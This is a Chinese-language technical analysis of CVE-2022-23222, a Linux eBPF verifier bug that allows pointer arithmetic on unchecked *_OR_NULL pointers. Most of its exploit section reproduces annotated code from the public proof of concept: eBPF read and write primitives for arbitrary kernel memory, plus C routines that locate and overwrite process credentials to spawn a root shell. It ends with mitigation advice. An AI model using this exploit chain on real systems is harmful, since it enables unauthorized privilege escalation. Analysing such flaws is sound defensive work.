0x00 背景
2022年1月14日,一个编号为CVE-2022-23222的漏洞被公开,这是一个位于eBPF验证器中的漏洞,漏洞允许eBPF程序在未经验证的情况下对特定指针进行运算,通过精心构造的代码,可以实现任意内核内存读写,而这将会造成本地提权的风险。
0x01 危害
随着漏洞Poc公开,这个漏洞的利用成本也无限趋近于0。但是这个漏洞的利用并不容易,需要本地允许非特权用户执行BPF程序,而这在大多数发行版中是默认禁止的。同时,由于漏洞在5.8.0版本内核中引入,而大多数生产环境并没有使用这么高的内核版本,所以,问题并不算很严重。
0x02 漏洞原理
在写eBPF程序时,对于bpf_map_lookup_elem()返回的结果,一定要判断是否为NULL,否则就会被验证器拒绝加载。这是因为bpf_map_lookup_elem()运行结果的结果有可能是NULL,这种情况表示没有查找到与key相关的值。如果不进行判断,那么接下来的代码就有可能引用了一个空指针,这是非常危险的操作。
那么,验证器是如何知道我们是否判断以及什么时候判断了结果是否为NULL呢?我们来看相关的实现代码。
bpf.h
/* types of values stored in eBPF registers */
/* Pointer types represent:
* pointer
* pointer + imm
* pointer + (u16) var
* pointer + (u16) var + imm
* if (range > 0) then [ptr, ptr + range - off) is safe to access
* if (id > 0) means that some 'var' was added
* if (off > 0) means that 'imm' was added
*/
enum bpf_reg_type {
NOT_INIT = 0, /* nothing was written into register */
SCALAR_VALUE, /* reg doesn't contain a valid pointer */
PTR_TO_CTX, /* reg points to bpf_context */
CONST_PTR_TO_MAP, /* reg points to struct bpf_map */
PTR_TO_MAP_VALUE, /* reg points to map element value */
PTR_TO_MAP_VALUE_OR_NULL, /* points to map elem value or NULL */
PTR_TO_STACK, /* reg == frame_pointer + offset */
PTR_TO_PACKET_META, /* skb->data - meta_len */
PTR_TO_PACKET, /* reg points to skb->data */
PTR_TO_PACKET_END, /* skb->data + headlen */
PTR_TO_FLOW_KEYS, /* reg points to bpf_flow_keys */
PTR_TO_SOCKET, /* reg points to struct bpf_sock */
PTR_TO_SOCKET_OR_NULL, /* reg points to struct bpf_sock or NULL */
PTR_TO_SOCK_COMMON, /* reg points to sock_common */
PTR_TO_SOCK_COMMON_OR_NULL, /* reg points to sock_common or NULL */
PTR_TO_TCP_SOCK, /* reg points to struct tcp_sock */
PTR_TO_TCP_SOCK_OR_NULL, /* reg points to struct tcp_sock or NULL */
PTR_TO_TP_BUFFER, /* reg points to a writable raw tp's buffer */
PTR_TO_XDP_SOCK, /* reg points to struct xdp_sock */
/* PTR_TO_BTF_ID points to a kernel struct that does not need
* to be null checked by the BPF program. This does not imply the
* pointer is _not_ null and in practice this can easily be a null
* pointer when reading pointer chains. The assumption is program
* context will handle null pointer dereference typically via fault
* handling. The verifier must keep this in mind and can make no
* assumptions about null or non-null when doing branch analysis.
* Further, when passed into helpers the helpers can not, without
* additional context, assume the value is non-null.
*/
PTR_TO_BTF_ID,
/* PTR_TO_BTF_ID_OR_NULL points to a kernel struct that has not
* been checked for null. Used primarily to inform the verifier
* an explicit null check is required for this struct.
*/
PTR_TO_BTF_ID_OR_NULL,
PTR_TO_MEM, /* reg points to valid memory region */
PTR_TO_MEM_OR_NULL, /* reg points to valid memory region or NULL */
PTR_TO_RDONLY_BUF, /* reg points to a readonly buffer */
PTR_TO_RDONLY_BUF_OR_NULL, /* reg points to a readonly buffer or NULL */
PTR_TO_RDWR_BUF, /* reg points to a read/write buffer */
PTR_TO_RDWR_BUF_OR_NULL, /* reg points to a read/write buffer or NULL */
PTR_TO_PERCPU_BTF_ID, /* reg points to a percpu kernel variable */
};
通过代码我们可知它通过“*_OR_NULL”类型来表示一个未经NULL判断的指针类型。当寄存器的类型是“*_OR_NULL”时,他只能进行非常有限的操作。只有当类型为“*_OR_NULL”的寄存器做完NULL比较后,才可能变为普通的指针,也就是“PTR_TO_*”类型。
出现漏洞的代码位于 linux/kernel/bpf/verifier.c
漏洞部分如下:
/* Handles arithmetic on a pointer and a scalar: computes new min/max and var_off.
* Caller should also handle BPF_MOV case separately.
* If we return -EACCES, caller may want to try again treating pointer as a
* scalar. So we only emit a diagnostic if !env->allow_ptr_leaks.
*/
static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
struct bpf_insn *insn,
const struct bpf_reg_state *ptr_reg,
const struct bpf_reg_state *off_reg)
{
...
switch (ptr_reg->type) {
case PTR_TO_MAP_VALUE_OR_NULL:
verbose(env, "R%d pointer arithmetic on %s prohibited, null-check it first\n",
dst, reg_type_str[ptr_reg->type]);
return -EACCES;
case CONST_PTR_TO_MAP:
/* smin_val represents the known value */
if (known && smin_val == 0 && opcode == BPF_ADD)
break;
fallthrough;
case PTR_TO_PACKET_END:
case PTR_TO_SOCKET:
case PTR_TO_SOCKET_OR_NULL:
case PTR_TO_SOCK_COMMON:
case PTR_TO_SOCK_COMMON_OR_NULL:
case PTR_TO_TCP_SOCK:
case PTR_TO_TCP_SOCK_OR_NULL:
case PTR_TO_XDP_SOCK:
verbose(env, "R%d pointer arithmetic on %s prohibited\n",
dst, reg_type_str[ptr_reg->type]);
return -EACCES;
default:
break;
}
...
return 0;
}
其中adjust_ptr_min_max_vals()是eBPF验证其用于检验指针加减运算的函数。这段代码使用switch来过滤不支持加减运算的指针类型,比如各种“*_OR_NULL”类型。但是这段代码里却少了很多类型的判断。这意味着,我们可以对这些少了的类型做加减运算,其中就包括一部分“*_OR_NULL”类型。
0x03 EXP
公开的Poc写的很规范,利用过程结构非常明确,具体如下:
phase_t phases[] = {
{ .name = "create bpf map(s)", .func = create_bpf_maps },
{ .name = "do some leak", .func = do_leak },
{ .name = "prepare arbitrary rw", .func = prepare_arbitrary_rw },
{ .name = "spawn processes", .func = spawn_processes },
{ .name = "find cred (slow)", .func = find_cred },
{ .name = "overwrite cred", .func = overwrite_cred },
{ .name = "spawn root shell", .func = spawn_root_shell },
{ .name = "clean up the mess", .func = clean_up , .ignore_error = 1 },
};
大致流程如下:
首先构造一个bpf map并利用漏洞泄露array_map的地址,然后构造任意内存地址读写原语。
紧接着,创建用于提权的进程,查找task_struct结构,对task_struct中的uid,gid,euid,egid进行覆盖,创建root shell。
接下来以注释的方式仔细分析其中的关键部分:
内核任意内存读取原语:
// r9 = r1
BPF_MOV64_REG(BPF_REG_9, BPF_REG_1),
/*
*bpf程序的参数放在r1寄存器
*这个参数就是实际上是一个指针数组
*其中前两个元素为要读取的内存地址
*这里把参数地址保存到r9寄存器
*/
// r0 = bpf_lookup_elem(ctx->comm_fd, 0)
BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd),
BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
/*
*获取对bpf_map[ctx->comm_fd]的引用
*/
// if (r0 == NULL) exit(1)
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
BPF_MOV64_IMM(BPF_REG_0, 1),
BPF_EXIT_INSN(),
// r8 = r0
BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),
/*
*将对bpf_map[ctx->comm_fd]的引用保存到r8寄存器
*/
// r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, PAGE_SIZE, 0)
BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd),
BPF_MOV64_IMM(BPF_REG_2, PAGE_SIZE),
BPF_MOV64_IMM(BPF_REG_3, 0x00),
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),
/*
*调用bpf_ringbuf_reserve
*构建一个必为NULL的*_OR_NULL指针
*/
BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 1),
/*
*将r0的*_OR_NULL指针保存到r1
*由于此时并未执行NULL判断
*r0和r1都不应该被允许进行计算
*利用漏洞执行r1+1
*此时r0 == 0,r1 == 1
*/
// if (r0 != NULL) { ringbuf_discard(r0, 1); exit(2); }
BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 5),
BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
BPF_MOV64_IMM(BPF_REG_2, 1),
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard),
BPF_MOV64_IMM(BPF_REG_0, 2),
BPF_EXIT_INSN(),
/*
*执行NULL判断
*结果必为r0==NULL
*但此时r1==1
*/
// verifier believe r0 = 0 and r1 = 0. However, r0 = 0 and r1 = 1 on runtime.
// r7 = (r1 + 1) * 8
BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 1),
BPF_ALU64_IMM(BPF_MUL, BPF_REG_7, 8),
/*
*此时r7 == 16
*/
// verifier believe r7 = 8, but r7 = 16 actually.
// store the array pointer
BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, -8),// *(r10 - 8) = reg8 = bpf_map[ctx->comm_fd]
/*
*将bpf_map[ctx->comm_fd]存储到r10 - 8
*/
/*
*此时栈结构如下:
*|r10+08| |
*| r10 | |
*|r10-08|bpf_map[ctx->comm_fd]|
*|r10-16| |
*/
// overwrite array pointer on stack
// r0 = bpf_skb_load_bytes_relative(r9, 0, r8, r7, 0)
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),
BPF_MOV64_IMM(BPF_REG_2, 0),
BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),//BPF_REG_3=BPF_REG_10=BPF_REG_8
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -16),//BPF_REG_3=BPF_REG_8-16
BPF_MOV64_REG(BPF_REG_4, BPF_REG_7),//BPF_REG_4=BPF_REG_7==16
BPF_MOV64_IMM(BPF_REG_5, 1),//(ptrs,0,r10-16,16,1)
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes_relative),
/*
*r0 = bpf_skb_load_bytes_relative(&addr,0,r10-16,16,1)
*执行完毕后将会覆盖r10-8处的内容
*此时栈结构如下:
*|r10+08| |
*| r10 | |
*|r10-08|addr[1]|
*|r10-16|addr[0]|
*/
// fetch our arbitrary address pointer
BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_10, -8),
/*
*r6=addr[1]
*此时r6为要读取的地址
*/
BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_6, 0),
/*
*r0=*addr[1]
*此时r0为要读取的地址中的内容
*/
BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_0, 0),
/*
*将结果保存到r8指向的内存
*即bpf_map[ctx->comm_fd]
*/
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN()
内核任意内存写入原语:
/*
*此处省略与读取原语相同部分
*此时栈结构如下:
*|r10+08| |
*| r10 | |
*|r10-08|addr[1]|
*|r10-16|addr[0]|
*/
// fetch our arbitrary address pointer
BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_10, -8),
/*
*r6=addr[1]
*此时r6为要写入的地址
*/
BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 0),
/*
*r0=(qwords)bpf_map[ctx->comm_fd][0]
*/
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_8, 8),
/*
*r0=(qwords)bpf_map[ctx->comm_fd][1]
*/
// if (r0 == 0) { *(u64*)r6 = r1 }
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_1, 0),
BPF_JMP_IMM(BPF_JA, 0, 0, 1),
// else { *(u32*)r6 = r1 }
BPF_STX_MEM(BPF_W, BPF_REG_6, BPF_REG_1, 0),
/*
*判断长度后将内容写入指定地址
*/
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN()
提权过程:
int spawn_processes(context_t *ctx)
{
for (int i = 0; i < PROC_NUM; i++)
{
pid_t child = fork();
if (child == 0) {
if (prctl(PR_SET_NAME, __ID__, 0, 0, 0) != 0) {
WARNF("Could not set name");
}
uid_t old = getuid();
kill(getpid(), SIGSTOP);
uid_t uid = getuid();
if (uid == 0 && old != uid) {
OKF("Enjoy root!");
system("/bin/sh");
}
exit(uid);
}
if (child < 0) {
return child;
}
ctx->processes[i] = child;
}
return 0;
}
首先fork一个子进程,在子进程中设置线程名为特定字符串并记录uid后暂停自己。等待被唤醒后,子进程检查当前uid,如果提权成功则执行一个shell。
而父进程将在记录子进程pid后继续执行find_cred。
int find_cred(context_t *ctx)
{
for (int i = 0; i < PAGE_SIZE*PAGE_SIZE ; i++)
{
u64 val = 0;
kaddr_t addr = ctx->array_map + PAGE_SIZE + i*0x8;
if (arbitrary_read(ctx, addr, &val, BPF_DW) != 0) {
WARNF("Could not read kernel address %p", addr);
return -1;
}
if (memcmp(&val, __ID__, sizeof(val)) == 0) {
kaddr_t cred_from_task = addr - 0x10;
if (arbitrary_read(ctx, cred_from_task + 8, &val, BPF_DW) != 0) {
WARNF("Could not read kernel address %p + 8", cred_from_task);
return -1;
}
if (val == 0 && arbitrary_read(ctx, cred_from_task, &val, BPF_DW) != 0) {
WARNF("Could not read kernel address %p + 0", cred_from_task);
return -1;
}
if (val != 0) {
ctx->cred = (kaddr_t)val;
DEBUGF("task struct ~ %p", cred_from_task);
DEBUGF("cred @ %p", ctx->cred);
DEBUGF("cred is %d", &(ctx->cred));
return 0;
}
}
}
return -1;
}
父进程在find_cred函数中使用了暴力搜索内存的方式,搜索子进程设置的线程名称,试图定位内核中task_struct的关键地址。一旦查找到关键地址,接下来会调用overwrite_cred函数覆盖task_struct中的uid,gid,euid,egid,从而实现提权。完成提权后,向子进程发送唤醒信号,并等待,子进程继续执行便会生成一个root权限的shell。
int overwrite_cred(context_t *ctx)
{
if (arbitrary_write(ctx, ctx->cred + OFFSET_uid_from_cred, 0, BPF_W) != 0) {
return -1;
}
if (arbitrary_write(ctx, ctx->cred + OFFSET_gid_from_cred, 0, BPF_W) != 0) {
return -1;
}
if (arbitrary_write(ctx, ctx->cred + OFFSET_euid_from_cred, 0, BPF_W) != 0) {
return -1;
}
if (arbitrary_write(ctx, ctx->cred + OFFSET_egid_from_cred, 0, BPF_W) != 0) {
return -1;
}
return 0;
}
int spawn_root_shell(context_t *ctx)
{
for (int i = 0; i < PROC_NUM; i++)
{
kill(ctx->processes[i], SIGCONT);
}
while(wait(NULL) > 0);
return 0;
}
0x04 总结
此漏洞本质上是eBPF验证器过滤不严,导致验证器的逻辑与实际执行时不一致,从而突破了验证器的安全检查,并最终导致内核任意内存读写。而提权的方法也不只有公开的exp一种,甚至完全可以利用漏洞构造出内核shellcode执行。
从这方面看来,漏洞还是很严重的,不过由于此漏洞利用需要允许非特权用户执行eBPF代码,而大多数发行版默认并不开启此功能,此漏洞的危害终究有限。
0x05 防范
升级内核到安全版本
禁止非特权用户执行eBPF程序,命令如下:
sudo sysctl kernel.unprivileged_bpf_disabled=1
0x06 参考资料
https://www.openwall.com/lists/oss-security/2022/01/14/1
https://github.com/tr3ee/CVE-2022-23222
https://github.com/torvalds/linux